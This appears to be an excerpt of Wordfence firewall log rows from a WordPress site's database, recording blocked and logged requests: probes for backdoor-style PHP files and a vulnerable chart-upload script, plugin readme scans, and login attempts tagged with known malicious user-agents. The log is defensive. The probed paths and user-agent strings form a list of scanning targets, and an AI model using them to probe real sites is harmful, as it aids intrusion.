(51806, 1712402803.796407, 1712402803.418100, '\0\0\0\0\0\0\0\0\0\0ÿÿÂ&', 0, 403, 0, 0, 0, 'https://happythinking.com/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php', NULL, 'ALittle Client', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"QUxpdHRsZSBDbGllbnQ=","path":"L2FkbWluaXN0cmF0b3IvY29tcG9uZW50cy9jb21fYWN5bWFpbGluZy9pbmMvb3BlbmZsYXNoL3BocC1vZmMtbGlicmFyeS9vZmNfdXBsb2FkX2ltYWdlLnBocA==","category":"brute-force","ssl":1}'),
(51807, 1712402801.533228, 1712402801.177400, '\0\0\0\0\0\0\0\0\0\0ÿÿÂ&', 0, 403, 0, 0, 0, 'https://happythinking.com/joobi/inc/openflashchart/php-ofc-library/ofc_upload_image.php', NULL, 'ALittle Client', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"QUxpdHRsZSBDbGllbnQ=","path":"L2pvb2JpL2luYy9vcGVuZmxhc2hjaGFydC9waHAtb2ZjLWxpYnJhcnkvb2ZjX3VwbG9hZF9pbWFnZS5waHA=","category":"brute-force","ssl":1}'),
(51809, 0.000000, 1712405863.628280, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51810, 1712406475.537452, 1712406475.008000, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvaW5kZXgucGhw","category":"brute-force","ssl":1}'),
(51808, 0.000000, 1712403436.702961, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51811, 1712406473.354577, 1712406472.962900, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/RxRjuuya.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvUnhSanV1eWEucGhw","category":"brute-force","ssl":1}'),
(51812, 1712406471.205074, 1712406470.784900, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvaW5kZXgucGhw","category":"brute-force","ssl":1}'),
(51813, 1712406469.076475, 1712406468.620100, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/RxRfwzfu.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvUnhSZnd6ZnUucGhw","category":"brute-force","ssl":1}'),
(51850, 0.000000, 1712442627.372645, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51851, 0.000000, 1712445075.625564, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51841, 1712425990.905192, 1712425990.646700, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/new/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L25ldy93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L25ldy93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(51848, 0.000000, 1712437762.185710, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51849, 0.000000, 1712440166.382309, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51842, 1712425988.693151, 1712425988.402800, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/wp/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwL3dwLWFkbWluL2luc3RhbGwucGhw","path":"L3dwL3dwLWFkbWluL2luc3RhbGwucGhw","category":"discovery-and-probing","ssl":1}'),
(51845, 0.000000, 1712430384.920410, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51846, 0.000000, 1712432902.202142, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51847, 0.000000, 1712435342.038633, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51843, 0.000000, 1712427489.628285, '\0\0\0\0\0\0\0\0\0\0ÿÿßæš', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51844, 0.000000, 1712427949.977668, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50452, 1711359168.520725, 1711359168.111400, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/Cache/Cache.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9DYWNoZS9DYWNoZS5waHA=","category":"brute-force","ssl":1}'),
(51687, 1712368011.611294, 1712368011.286400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-3dflick-slideshow/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/120.0.2210.160', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC0zZGZsaWNrLXNsaWRlc2hvdy9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC0zZGZsaWNrLXNsaWRlc2hvdy9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51682, 1712367997.158777, 1712367996.845000, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/blaze-slide-show-for-wordpress/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9ibGF6ZS1zbGlkZS1zaG93LWZvci13b3JkcHJlc3MvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9ibGF6ZS1zbGlkZS1zaG93LWZvci13b3JkcHJlc3MvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51680, 1712367998.214316, 1712367997.915000, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-catprogallery/readme.txt', NULL, 'Mozilla/5.0 (Android 14; Mobile; LG-M255; rv:122.0) Gecko/122.0 Firefox/122.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1jYXRwcm9nYWxsZXJ5L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1jYXRwcm9nYWxsZXJ5L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51681, 1712367997.159033, 1712367996.845000, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/blaze-slide-show-for-wordpress/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9ibGF6ZS1zbGlkZS1zaG93LWZvci13b3JkcHJlc3MvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9ibGF6ZS1zbGlkZS1zaG93LWZvci13b3JkcHJlc3MvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51453, 0.000000, 1712320667.143259, '\0\0\0\0\0\0\0\0\0\0ÿÿÉ—è', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51690, 1712368010.477387, 1712368010.113800, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-3dbanner-rotator/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.8', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC0zZGJhbm5lci1yb3RhdG9yL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC0zZGJhbm5lci1yb3RhdG9yL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51691, 1712368009.246418, 1712368008.884200, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-image-news-slider/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1pbWFnZS1uZXdzLXNsaWRlci9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1pbWFnZS1uZXdzLXNsaWRlci9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(50880, 1712082394.760708, 1712082394.301800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/bypass.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2J5cGFzcy5waHA=","category":"brute-force","ssl":1}'),
(50881, 1712082380.778991, 1712082380.303700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-conflg.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbmZsZy5waHA=","category":"brute-force","ssl":1}'),
(51692, 1712368009.246185, 1712368008.884200, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-image-news-slider/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1pbWFnZS1uZXdzLXNsaWRlci9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1pbWFnZS1uZXdzLXNsaWRlci9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51693, 1712368008.023718, 1712368007.575800, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-homepage-slideshow/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/116.0.5746.194 Chrome/116.0.5746.194 Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1ob21lcGFnZS1zbGlkZXNob3cvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1ob21lcGFnZS1zbGlkZXNob3cvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50884, 1712082361.326417, 1712082360.750000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/content.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbnRlbnQucGhw","category":"brute-force","ssl":1}'),
(50296, 1711080782.610076, 1711080782.226800, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(50905, 1712082609.934921, 1712082608.913200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-hudbud.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWh1ZGJ1ZC5waHA=","category":"brute-force","ssl":1}'),
(50395, 1711218389.721711, 1711218388.266000, '\0\0\0\0\0\0\0\0\0\0ÿÿ­Ôío', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50663, 1711731890.471143, 1711731890.078700, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///ajax-actions.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vYWpheC1hY3Rpb25zLnBocA==","category":"brute-force","ssl":1}'),
(50650, 1711731912.355877, 1711731911.969400, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///adminfuns.php7', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vYWRtaW5mdW5zLnBocDc=","category":"brute-force","ssl":1}'),
(50552, 1711503654.093158, 1711503652.986700, '\0\0\0\0\0\0\0\0\0\0ÿÿ3‘.''', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50534, 1711400559.255266, 1711400558.198700, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/fm1.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVpbGQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9iaWxlIFNhZmFyaS81MzcuMzY=","path":"L2ZtMS5waHA=","category":"brute-force","ssl":1}'),
(51730, 1712368236.156401, 1712368235.859500, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/flipbook/readme.txt', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9mbGlwYm9vay9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9mbGlwYm9vay9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
